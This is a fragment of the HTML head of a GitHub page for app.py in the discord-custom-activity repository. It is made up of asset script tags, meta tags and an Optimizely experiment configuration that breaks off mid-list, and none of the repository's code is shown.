integrity="sha512-bd5GjqJFbZLxlG4FXlu80JVzUSEHzxtnyyS98c3BaPbl32yravYkO9dNLUeI5QOm1XU7zIzJ0J5HOEQSfkgJOA==" type="application/javascript" src="https://github.githubassets.com/assets/environment-6dde468e.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-c7dOB6hGd6OdYvUCrqXG0876tW5VQnJrRaBTz6kBjLZcGw2tKiXHfzDEiX5WEo1dseR2ilkdJPiZe1u0FrVhkg==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-frameworks-73b74e07.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HKLxo1SCuvyND9pKagScspQtPtfYM442e7MMfig1ctv3M4xldrFt9nTLKE+KSshAfgn9839j9+BZPEeeUjJjKQ==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-vendor-1ca2f1a3.js"></script> <script crossorigin="anonymous" defer="defer" 
integrity="sha512-EaSGeSQFfxLpe/avYyWp+85njCuoiL1FSklaKpZW18T+zwAl6eUjL/gMoISAY62x7+aNOtNG9V7awsMzgkgiJw==" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-11a48679.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Fv0IGb7X6YOQOp7bIjfuvISOJJCEsBWtmrn3neVFkckbHHt4pT0+T0nDl2mwVb1RCWVvS1DcZstOPl+SRFb0oA==" type="application/javascript" data-module-id="./chunk-advanced.js" data-src="https://github.githubassets.com/assets/chunk-advanced-16fd0819.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-5tWKSr7mhAzSh4Sx5YRFgKftdGxKwHKnOGYw5DlxjHhkQVURYFU3Bk5IMOGMKuAiJTlC3OXYM3xzGcyjzuEFQQ==" type="application/javascript" data-module-id="./chunk-animate-on-scroll.js" data-src="https://github.githubassets.com/assets/chunk-animate-on-scroll-e6d58a4a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-KT8PJraOSW8f9HMDRcjmyilvPC/PVT3Pd9NpBA036w4RRzXaJGd/cSB8JxswenJDhSAPuydYcePTx8wWv/5CQw==" type="application/javascript" data-module-id="./chunk-codemirror.js" data-src="https://github.githubassets.com/assets/chunk-codemirror-293f0f26.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ol5y71RI6PxIzSuxVDnwevlSWZzk4bNc3O/EjhN5zfx6VPqcyDOAiN9CoTydwOZwe2K3Jmu+85/EV19h4A13Uw==" type="application/javascript" data-module-id="./chunk-color-modes.js" data-src="https://github.githubassets.com/assets/chunk-color-modes-a25e72ef.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-DbpM4Xk+KtL8iCOI+ZACZGMdHN+r6aXCD2Wibv0FOD6mvDnGinYFYfj0BcPOrN5Ku2lJuhXylCh2wNDCLPBBeQ==" type="application/javascript" data-module-id="./chunk-confetti.js" data-src="https://github.githubassets.com/assets/chunk-confetti-0dba4ce1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xrMxZfj62OcLN3FgzDtzy+P688RoxGL3nmdd2r4qJEjQZq5ZkqBwD6WiRoV4Mhnds8Y7JQebMbRCTITdFlZytg==" type="application/javascript" 
data-module-id="./chunk-contributions-spider-graph.js" data-src="https://github.githubassets.com/assets/chunk-contributions-spider-graph-c6b33165.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-vpt2Tdt20tOKRtrRWtOVaRi2wBoAaflNGUR6xuQgU/0Ywfxvbazq0C2hhKwuiC8b6A813gXGm+8fj0NCEosbYQ==" type="application/javascript" data-module-id="./chunk-copy.js" data-src="https://github.githubassets.com/assets/chunk-copy-be9b764d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-arflMFcVzVAYaP2n7m7gklPChWsVsCDtRPav2Cb6bqLeJf8pgbojWJ3EseKXILCIqfxl/v6arBduZ9SLmpMEZw==" type="application/javascript" data-module-id="./chunk-delayed-loading-element.js" data-src="https://github.githubassets.com/assets/chunk-delayed-loading-element-6ab7e530.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6j/oSF+kbW+yetNPvI684VzAu9pzug6Vj2h+3u1LdCuRhR4jnuiHZfeQKls3nxcT/S3H+oIt7FtigE/aeoj+gg==" type="application/javascript" data-module-id="./chunk-drag-drop.js" data-src="https://github.githubassets.com/assets/chunk-drag-drop-ea3fe848.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-VSSd+Yzi2iMS+pibY6hD/WdypxAEdob5F2RMKxuKcAHS2EpFYJPeTXoVxt0NXg03tfj2dka2mEtHS+vjpYSaDw==" type="application/javascript" data-module-id="./chunk-edit-hook-secret-element.js" data-src="https://github.githubassets.com/assets/chunk-edit-hook-secret-element-55249df9.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ErqZFlIt7zIbLoZHvwfq9Zjo5zo+Y1A410nePDGvK+WVTVP10iNTfoqdOOSZNSy1gtLKIWDIIiOV30lr6zUJCA==" type="application/javascript" data-module-id="./chunk-edit.js" data-src="https://github.githubassets.com/assets/chunk-edit-12ba9916.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-aiqMIGGZGo8AQMjcoImKPMTsZVVRl6htCSY7BpRmpGPG/AF+Wq+P/Oj/dthWQOIk9cCNMPEas7O2zAR6oqn0tA==" type="application/javascript" data-module-id="./chunk-emoji-picker-element.js" 
data-src="https://github.githubassets.com/assets/chunk-emoji-picker-element-6a2a8c20.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-grRajv+ZiHV6dOdj1ZVsPoGYLqUr9lblDxPEuf6Fo3/GNfqIwV0NUvqiq05w68106TDk/g3iUkpOjDEpiEepuA==" type="application/javascript" data-module-id="./chunk-failbot.js" data-src="https://github.githubassets.com/assets/chunk-failbot-82b45a8e.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-3jmKS/bkQpYNk9QJJ6D0y6iGTh7Lu2UVD/QLZZqutFE7e3IXxhEbQX0GXbl0PQWZ6whWKViOT3pOf/5zcaCXcA==" type="application/javascript" data-module-id="./chunk-feature-callout-element.js" data-src="https://github.githubassets.com/assets/chunk-feature-callout-element-de398a4b.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-OszE/6GlmrYt3ALid4xVFd3/4d9cUH08ndFsO7vs/RHCz2bJ8+UsbjBc8wf09hyCOe9PuEgW0HDWpD32xMio2Q==" type="application/javascript" data-module-id="./chunk-filter-input.js" data-src="https://github.githubassets.com/assets/chunk-filter-input-3accc4ff.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-BV7wU3kptBGiv52rPu5ez9Fp8hDs9NxIm75USxtiip+HjDhStyYpG7hQMatWFmoYcumArHN0IAbC0b8XJfg+Hw==" type="application/javascript" data-module-id="./chunk-get-repo-element.js" data-src="https://github.githubassets.com/assets/chunk-get-repo-element-055ef053.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-JuwLQc/GiXiL3aQZ3y52X1UWniOU21IfTqzwnrfsFgxCwwhPUgh7KcIHb2oTxGC+yi7k5KN1mGVRifLWQMcfVw==" type="application/javascript" data-module-id="./chunk-insights-query.js" data-src="https://github.githubassets.com/assets/chunk-insights-query-26ec0b41.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4Wq8F/+bu5aXHG0CFx4Z1Whiip3tIAR70gvZgZtx8HiTLyBdzEUSSA9Soe3c67SUGuiJQB834x/1sse1bxBmeg==" type="application/javascript" data-module-id="./chunk-invitations.js" 
data-src="https://github.githubassets.com/assets/chunk-invitations-e16abc17.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-AifR/xlMdAmSB9UcJEPQ16P863/ZqDphDeGKBZSPuSgsNaaehDErJfLCn1saUs0o0fAuM0jr+Sxr4HtQp7qpBA==" type="application/javascript" data-module-id="./chunk-jump-to.js" data-src="https://github.githubassets.com/assets/chunk-jump-to-0227d1ff.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-G/DI+JNZR6uAoSYxBCT6GSHHvZgBBCF1S40IIX/C797hFmg10tGcnlCbv3AzbBsPRPfQlh0GKZv5019fihsLow==" type="application/javascript" data-module-id="./chunk-keyboard-shortcuts-helper.js" data-src="https://github.githubassets.com/assets/chunk-keyboard-shortcuts-helper-1bf0c8f8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-3q9CgTtVlQ6fkBQRgpwkwOZ+3tHjtGqOJeAI+Vp4bbcig2h1mR9iRJG2ohClN8+YThWAOBxizc8R/yrZPbxNSw==" type="application/javascript" data-module-id="./chunk-launch-code-element.js" data-src="https://github.githubassets.com/assets/chunk-launch-code-element-deaf4281.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-m2VwI1wpMT5jpAzQLL7sVG0WkxzNAiBXeitEnh0A2tUHb+r4sVRzoR8PAyf0+zUkEDO5Ne5DBWO7gM2FtdT7cw==" type="application/javascript" data-module-id="./chunk-line-chart.js" data-src="https://github.githubassets.com/assets/chunk-line-chart-9b657023.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-7G7VNhRoIxfK6aKTgUSUtMHI6U0k+szgDfwZIEcKuQKs+K0XZGfVivusB0NlOy78zixfFSI7NHzmvHike+5uyQ==" type="application/javascript" data-module-id="./chunk-metric-selection-element.js" data-src="https://github.githubassets.com/assets/chunk-metric-selection-element-ec6ed536.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-7hZ031ngiF36wGsfcoyyCWTqwYxjX+qeTLtCV7CJ+IO+wzkzCm1RoR3WzWczfWmwLNqr+Hu3kQOgkBaGn4ntWQ==" type="application/javascript" data-module-id="./chunk-notification-list-focus.js" 
data-src="https://github.githubassets.com/assets/chunk-notification-list-focus-ee1674df.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ow4QYm35S5iR6nm/e/tx16lHUTK8pg1Ke1asLBVj6HzevTuo7S0GcL+7sWjvKOBvrVLgbwyPzfth75Vs6L3ePQ==" type="application/javascript" data-module-id="./chunk-premium-runners.js" data-src="https://github.githubassets.com/assets/chunk-premium-runners-a30e1062.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-wXlv/QM4OsXYyUuSfFjx3XqSmvfLqtjvBx6wFlGNmHzd6Dkmr1HkTZs1qpCYTCjiyw1zm5ORa4O4gWAKc+cKPw==" type="application/javascript" data-module-id="./chunk-presence-avatars.js" data-src="https://github.githubassets.com/assets/chunk-presence-avatars-c1796ffd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4O3AMK3FmKoTDmbBwFGIg+rNW3s73lJFQNLSBF1bczsjNsi8zT2t54vTwY1cMG1dox6Nt11wRGhevi1wxOFhWw==" type="application/javascript" data-module-id="./chunk-profile-pins-element.js" data-src="https://github.githubassets.com/assets/chunk-profile-pins-element-e0edc030.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-hgoSKLTlL8I3IWr/TLONCU+N4kdCtdrHCrrud4NKhgRlLrTw0XUPhqBaDdZUiFSzDQRw/nFQ1kw2VeTm0g9+lA==" type="application/javascript" data-module-id="./chunk-profile.js" data-src="https://github.githubassets.com/assets/chunk-profile-860a1228.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-7KSTAXtI9DmFWoq8LjFSgxvvQZBoKHjyN5ZBzEWZ39P/CSWrQf/VaVKd0zpkd8vDk7mq7bcDSniipoFbjTABUA==" type="application/javascript" data-module-id="./chunk-pulse-authors-graph-element.js" data-src="https://github.githubassets.com/assets/chunk-pulse-authors-graph-element-eca49301.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-nOP8bLqNZgktv1/5mFrm9LhZDgozlsEbAj/XuQ35rxK/NNbqAmBDfeXQ+pkY5SXDd/8Bz/+RGfwr3FHL2sopSQ==" type="application/javascript" data-module-id="./chunk-readme-toc-element.js" 
data-src="https://github.githubassets.com/assets/chunk-readme-toc-element-9ce3fc6c.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-rhladi60G4WRCtFkJAErIB32DBQt6BIMuzFRR0wJ68nWcqex4+C5Xb62rsOSNdluP3kuaSyWT3GTLCDSLv5jIA==" type="application/javascript" data-module-id="./chunk-ref-selector.js" data-src="https://github.githubassets.com/assets/chunk-ref-selector-ae195a76.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-OoQBKokKMwRbi8BnCiii19MhicXF30O4k4hG7Vjg4xOltzKOC3kmOT0ERg0JBHqWGfjuMRWhuGNEX2EKgxalUw==" type="application/javascript" data-module-id="./chunk-remote-clipboard-copy.js" data-src="https://github.githubassets.com/assets/chunk-remote-clipboard-copy-3a84012a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-9XDv6O7Jn1ObhwWefPuUA4owGMOkPsTnvIITKck1CaZH35Sad6L1gq+Vvw8TEeB+gYUgBxWdkl3LgXjVkpDWMQ==" type="application/javascript" data-module-id="./chunk-responsive-underlinenav.js" data-src="https://github.githubassets.com/assets/chunk-responsive-underlinenav-f570efe8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-8EhI56c+WrEr07oNcFy+Q329w5+DQVhB2TO9e0bT/TxnooHtwze/OanZof/+zDJxW7RbYY2pzRVwLRvoJRHUrA==" type="application/javascript" data-module-id="./chunk-runner-groups.js" data-src="https://github.githubassets.com/assets/chunk-runner-groups-f04848e7.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-fDNA1jZjxFyXNVY10A8BfaZE/vpXhcnOI23xRlVWDJwmLsDsGm+5fedVhSPI9xxWfAVd9x6dFgZ0wzJRhFo3Rw==" type="application/javascript" data-module-id="./chunk-series-table.js" data-src="https://github.githubassets.com/assets/chunk-series-table-7c3340d6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-bjSP8StMagdENf3/Xy8fkbUePS7vNbw+2hpgg0tne7zm/eiz3b1mM0XthFTSfxhO9QHFD8wO/hOCcbnORvN3NA==" type="application/javascript" data-module-id="./chunk-severity-calculator-element.js" 
data-src="https://github.githubassets.com/assets/chunk-severity-calculator-element-6e348ff1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SBHO7sHXCuNn05KXDWS2ESheFt4K2kHRApzXS5HnFzOcb3d1yP0l44PDzciQdCLs9Bqf5LT5TdSL9X1P3ELwUA==" type="application/javascript" data-module-id="./chunk-slug.js" data-src="https://github.githubassets.com/assets/chunk-slug-4811ceee.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-OhOqF8hc26oNrxmRDWKLI5q2fZ981+zlYQnP8NWdQdHVw4/PS458WilKGoU2xaMsoFD7VmzAv0/TEUDbrDLpNA==" type="application/javascript" data-module-id="./chunk-sortable-behavior.js" data-src="https://github.githubassets.com/assets/chunk-sortable-behavior-3a13aa17.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4QXRinR8LP2zrjFze0MDwuRPeLAojLt0f8KEdUTJdb2YkYLLgYGqolD+6R7ZDq9Z4JN8R7W6l8Ol+Mq1K0o2hg==" type="application/javascript" data-module-id="./chunk-stacked-area-chart.js" data-src="https://github.githubassets.com/assets/chunk-stacked-area-chart-e105d18a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-r43awUBZWgUCEeqtDxYagERDbdN40mKXncMXD3WOB/COTYK83O6LTdXAgSQqR8pzYLutqstdN/O69iL641ka9w==" type="application/javascript" data-module-id="./chunk-stacks-input-config-view.js" data-src="https://github.githubassets.com/assets/chunk-stacks-input-config-view-af8ddac1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-+ghwIHl4WoTIKefFnsS00RF8wYc+3MqK4eEh1Rst68581JyTbm7O1RxzJjjzlXscQC81/zl70xwhc+SjdReoIA==" type="application/javascript" data-module-id="./chunk-three.module.js" data-src="https://github.githubassets.com/assets/chunk-three.module-fa087020.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-THgJsKACwTri1ETwLTU7myuj4XY4Jp4ZNziTof0Fo6v0iOljLueWxBybgtoOk1xWxa51GupjBc+gOoPGj8TaZA==" type="application/javascript" data-module-id="./chunk-tip.js" 
data-src="https://github.githubassets.com/assets/chunk-tip-4c7809b0.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-WK8VXw3lfUQ/VRW0zlgKPhcMUqH0uTnB/KzePUPdZhCm/HpxfXXHKTGvj5C0Oex7+zbIM2ECzULbtTCT4ug3yg==" type="application/javascript" data-module-id="./chunk-toast.js" data-src="https://github.githubassets.com/assets/chunk-toast-58af155f.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ZunpwBOViRebn/36Tku+7ZX39dPhNTIyKl+mL5t3n4F9JrcHiwYJdApE8OWHcvkzmGuD0f/AlUwzPIrafMHMBw==" type="application/javascript" data-module-id="./chunk-tweetsodium.js" data-src="https://github.githubassets.com/assets/chunk-tweetsodium-66e9e9c0.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-fvcOOYapCxPkDRQWz2WQzrqL6rRhX88yHWF87fb9Xny2Fq4lri0ONaVFL7XDSTiTyu4OTp+8WoyfMVpgGUaaVg==" type="application/javascript" data-module-id="./chunk-unveil.js" data-src="https://github.githubassets.com/assets/chunk-unveil-7ef70e39.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-hXM+wbN4loHepYG9wciuBZIBbZKnyrj1fHNEc2U4FGp4ferKbr4SA/wGyOZUun/W+yw+aHi0R0ZQqgr0YBFhQQ==" type="application/javascript" data-module-id="./chunk-user-status-submit.js" data-src="https://github.githubassets.com/assets/chunk-user-status-submit-85733ec1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-wQnjXBFgueIl3c4MJVGGbqMThHgUcsOVtWP3vsLqqjRdtPae9B/fXj91Ow2UyzOF3b28lFfDi3jCyrJ+0oc/5g==" type="application/javascript" data-module-id="./chunk-webgl-warp.js" data-src="https://github.githubassets.com/assets/chunk-webgl-warp-c109e35c.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-A4qmVMCzB5D2dyHe2jUKlYmeGBxzaGzo+me2FKfRqrKfvAFQqnb8lSH60xmtaAGbaJze3hBMBlA2IlCLCvFwLg==" type="application/javascript" src="https://github.githubassets.com/assets/repositories-038aa654.js"></script> <script crossorigin="anonymous" defer="defer" 
integrity="sha512-VkWgu6DTrdgalvai4dv3kFM+AW4sPKJ0HnXDkTR+ED2YuypnGKavD4cqmX0iwDu1nE46Iax70/mdH5hWKOjSGQ==" type="application/javascript" src="https://github.githubassets.com/assets/diffs-5645a0bb.js"></script> <meta name="viewport" content="width=device-width"> <title>discord-custom-activity/app.py at master · agambajwa/discord-custom-activity</title> <meta name="description" content="Custom Activity for users on Discord. Contribute to agambajwa/discord-custom-activity development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/9406fb387f4cda6ec027dc5254604a347e68437b1b79b7a4e20ce47057c0766d/agambajwa/discord-custom-activity" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="discord-custom-activity/app.py at master · agambajwa/discord-custom-activity" /><meta name="twitter:description" content="Custom Activity for users on Discord. Contribute to agambajwa/discord-custom-activity development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/9406fb387f4cda6ec027dc5254604a347e68437b1b79b7a4e20ce47057c0766d/agambajwa/discord-custom-activity" /><meta property="og:image:alt" content="Custom Activity for users on Discord. Contribute to agambajwa/discord-custom-activity development by creating an account on GitHub." 
/><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="discord-custom-activity/app.py at master · agambajwa/discord-custom-activity" /><meta property="og:url" content="https://github.com/agambajwa/discord-custom-activity" /><meta property="og:description" content="Custom Activity for users on Discord. Contribute to agambajwa/discord-custom-activity development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/"> <link rel="shared-web-socket" href="wss://alive.github.com/_sockets/u/91737103/ws?session=eyJ2IjoiVjMiLCJ1Ijo5MTczNzEwMywicyI6NzYxNzA1MDI2LCJjIjo0MTc3MzU0NDYyLCJ0IjoxNjMzMzQ2MTgxfQ==--39edc59650e83b8d21b49e80f0dc2c8d8b193b66b4ee07dbdcea646522e41c9a" data-refresh-url="/_alive" data-session-id="7f83f766808e89f2c7b35c4840e92fc948d791956ae5c8a102edd36d614a7dd3"> <link rel="shared-web-socket-src" href="/socket-worker-0af8a29d.js"> <link rel="sudo-modal" href="/sessions/sudo_modal"> <meta name="request-id" content="A49F:7859:D3968:14FACD:615AE285" data-pjax-transient="true" /><meta name="html-safe-nonce" content="820993e64658c9849c0e0da6552784777372f6b8c3b5cd1e47564c3857ce68f9" data-pjax-transient="true" /><meta name="visitor-payload" content="eyJyZWZlcnJlciI6Imh0dHBzOi8vZ2l0aHViLmNvbS9hZ2FtYmFqd2EvZGlzY29yZC1jdXN0b20tYWN0aXZpdHkiLCJyZXF1ZXN0X2lkIjoiQTQ5Rjo3ODU5OkQzOTY4OjE0RkFDRDo2MTVBRTI4NSIsInZpc2l0b3JfaWQiOiI2NzQzMDk1MDUyODcxMjcyNDA5IiwicmVnaW9uX2VkZ2UiOiJzb3V0aGVhc3Rhc2lhIiwicmVnaW9uX3JlbmRlciI6ImlhZCJ9" data-pjax-transient="true" /><meta name="visitor-hmac" content="df6cd9ddda4db95524fb9c3c9cc17f8b88a8f25b230bc1e43f92b48812fa8bbd" data-pjax-transient="true" /> <meta name="hovercard-subject-tag" content="repository:298526344" data-pjax-transient> <meta name="github-keyboard-shortcuts" content="repository,source-code" data-pjax-transient="true" 
/> <meta name="selected-link" value="repo_source" data-pjax-transient> <meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="octolytics-host" content="collector.githubapp.com" /><meta name="octolytics-app-id" content="github" /><meta name="octolytics-event-url" content="https://collector.githubapp.com/github-external/browser_event" /><meta name="octolytics-actor-id" content="91737103" /><meta name="octolytics-actor-login" content="Bomzz06" /><meta name="octolytics-actor-hash" content="768d6322e087f5dd93879e36a05bc5cd2c0b8e677c83f0a6378ea6775b96f44b" /> <meta name="analytics-location" content="/&lt;user-name&gt;/&lt;repo-name&gt;/blob/show" data-pjax-transient="true" /> <meta name="optimizely-datafile" content="{&quot;version&quot;: &quot;4&quot;, &quot;rollouts&quot;: [], &quot;typedAudiences&quot;: [], &quot;anonymizeIP&quot;: true, &quot;projectId&quot;: &quot;16737760170&quot;, &quot;variables&quot;: [], &quot;featureFlags&quot;: [], &quot;experiments&quot;: [{&quot;status&quot;: &quot;Running&quot;, &quot;audienceIds&quot;: [], &quot;variations&quot;: [{&quot;variables&quot;: [], &quot;id&quot;: &quot;20438636352&quot;, &quot;key&quot;: &quot;control&quot;}, {&quot;variables&quot;: [], &quot;id&quot;: &quot;20484957397&quot;, &quot;key&quot;: &quot;treatment&quot;}], &quot;id&quot;: &quot;20479227424&quot;, &quot;key&quot;: &quot;growth_ghec_onboarding_experience&quot;, &quot;layerId&quot;: &quot;20467848595&quot;, &quot;trafficAllocation&quot;: [{&quot;entityId&quot;: &quot;20484957397&quot;, &quot;endOfRange&quot;: 1000}, {&quot;entityId&quot;: &quot;20438636352&quot;, &quot;endOfRange&quot;: 5000}, {&quot;entityId&quot;: 
&quot;20438636352&quot;, &quot;endOfRange&quot;: 6000}, {&quot;entityId&quot;: &quot;20484957397&quot;, &quot;endOfRange&quot;: 8000}, {&quot;entityId&quot;: &quot;20484957397&quot;, &quot;endOfRange&quot;: 10000}], &quot;forcedVariations&quot;: {}}, {&quot;status&quot;: &quot;Running&quot;, &quot;audienceIds&quot;: [], &quot;variations&quot;: [{&quot;variables&quot;: [], &quot;id&quot;: &quot;20508232513&quot;, &quot;key&quot;: &quot;control&quot;}, {&quot;variables&quot;: [], &quot;id&quot;: &quot;20533742085&quot;, &quot;key&quot;: &quot;treatment&quot;}], &quot;id&quot;: &quot;20512531891&quot;, &quot;key&quot;: &quot;growth_pull_request_actions_prompt&quot;, &quot;layerId&quot;: &quot;20529822202&quot;, &quot;trafficAllocation&quot;: [{&quot;entityId&quot;: &quot;20533742085&quot;, &quot;endOfRange&quot;: 5000}, {&quot;entityId&quot;: &quot;20508232513&quot;, &quot;endOfRange&quot;: 10000}], &quot;forcedVariations&quot;: {}}, {&quot;status&quot;: &quot;Running&quot;, &quot;audienceIds&quot;: [], &quot;variations&quot;: [{&quot;variables&quot;: [], &quot;id&quot;: &quot;20543572345&quot;, &quot;key&quot;: &quot;control&quot;}, {&quot;variables&quot;: [], &quot;id&quot;: &quot;20510876757&quot;, &quot;key&quot;: &quot;treatment&quot;}], &quot;id&quot;: &quot;20518037255&quot;, &quot;key&quot;: &quot;growth_issue_actions_prompt&quot;, &quot;layerId&quot;: &quot;20522524291&quot;, &quot;trafficAllocation&quot;: [{&quot;entityId&quot;: &quot;20510876757&quot;, &quot;endOfRange&quot;: 5000}, {&quot;entityId&quot;: &quot;20543572345&quot;, &quot;endOfRange&quot;: 10000}], &quot;forcedVariations&quot;: {}}, {&quot;status&quot;: &quot;Running&quot;, &quot;audienceIds&quot;: [], &quot;variations&quot;: [{&quot;variables&quot;: [], &quot;id&quot;: &quot;20619540113&quot;, &quot;key&quot;: &quot;control&quot;}, {&quot;variables&quot;: [], &quot;id&quot;: &quot;20598530123&quot;, &quot;key&quot;: &quot;treatment&quot;}], &quot;id&quot;: &quot;20619150105&quot;, 
&quot;key&quot;: &quot;dynamic_seats&quot;, &quot;layerId&quot;: &quot;20615170077&quot;, &quot;trafficAllocation&quot;: [{&quot;entityId&quot;: &quot;20598530123&quot;, &quot;endOfRange&quot;: 5000}, {&quot;entityId&quot;: &quot;20619540113&quot;, &quot;endOfRange&quot;: 10000}], &quot;forcedVariations&quot;: {}}], &quot;audiences&quot;: [{&quot;conditions&quot;: &quot;[\&quot;or\&quot;, {\&quot;match\&quot;: \&quot;exact\&quot;, \&quot;name\&quot;: \&quot;$opt_dummy_attribute\&quot;, \&quot;type\&quot;: \&quot;custom_attribute\&quot;, \&quot;value\&quot;: \&quot;$opt_dummy_value\&quot;}]&quot;, &quot;id&quot;: &quot;$opt_dummy_audience&quot;, &quot;name&quot;: &quot;Optimizely-Generated Audience for Backwards Compatibility&quot;}], &quot;groups&quot;: [], &quot;sdkKey&quot;: &quot;WTc6awnGuYDdG98CYRban&quot;, &quot;environmentKey&quot;: &quot;production&quot;, &quot;attributes&quot;: [{&quot;id&quot;: &quot;16822470375&quot;, &quot;key&quot;: &quot;user_id&quot;}, {&quot;id&quot;: &quot;17143601254&quot;, &quot;key&quot;: &quot;spammy&quot;}, {&quot;id&quot;: &quot;18175660309&quot;, &quot;key&quot;: &quot;organization_plan&quot;}, {&quot;id&quot;: &quot;18813001570&quot;, &quot;key&quot;: &quot;is_logged_in&quot;}, {&quot;id&quot;: &quot;19073851829&quot;, &quot;key&quot;: &quot;geo&quot;}, {&quot;id&quot;: &quot;20175462351&quot;, &quot;key&quot;: &quot;requestedCurrency&quot;}], &quot;botFiltering&quot;: false, &quot;accountId&quot;: &quot;16737760170&quot;, &quot;events&quot;: [{&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;17911811441&quot;, &quot;key&quot;: &quot;hydro_click.dashboard.teacher_toolbox_cta&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18124116703&quot;, &quot;key&quot;: &quot;submit.organizations.complete_sign_up&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18145892387&quot;, &quot;key&quot;: &quot;no_metric.tracked_outside_of_optimizely&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: 
&quot;18178755568&quot;, &quot;key&quot;: &quot;click.org_onboarding_checklist.add_repo&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18180553241&quot;, &quot;key&quot;: &quot;submit.repository_imports.create&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18186103728&quot;, &quot;key&quot;: &quot;click.help.learn_more_about_repository_creation&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18188530140&quot;, &quot;key&quot;: &quot;test_event.do_not_use_in_production&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18191963644&quot;, &quot;key&quot;: &quot;click.empty_org_repo_cta.transfer_repository&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18195612788&quot;, &quot;key&quot;: &quot;click.empty_org_repo_cta.import_repository&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18210945499&quot;, &quot;key&quot;: &quot;click.org_onboarding_checklist.invite_members&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18211063248&quot;, &quot;key&quot;: &quot;click.empty_org_repo_cta.create_repository&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18215721889&quot;, &quot;key&quot;: &quot;click.org_onboarding_checklist.update_profile&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18224360785&quot;, &quot;key&quot;: &quot;click.org_onboarding_checklist.dismiss&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: 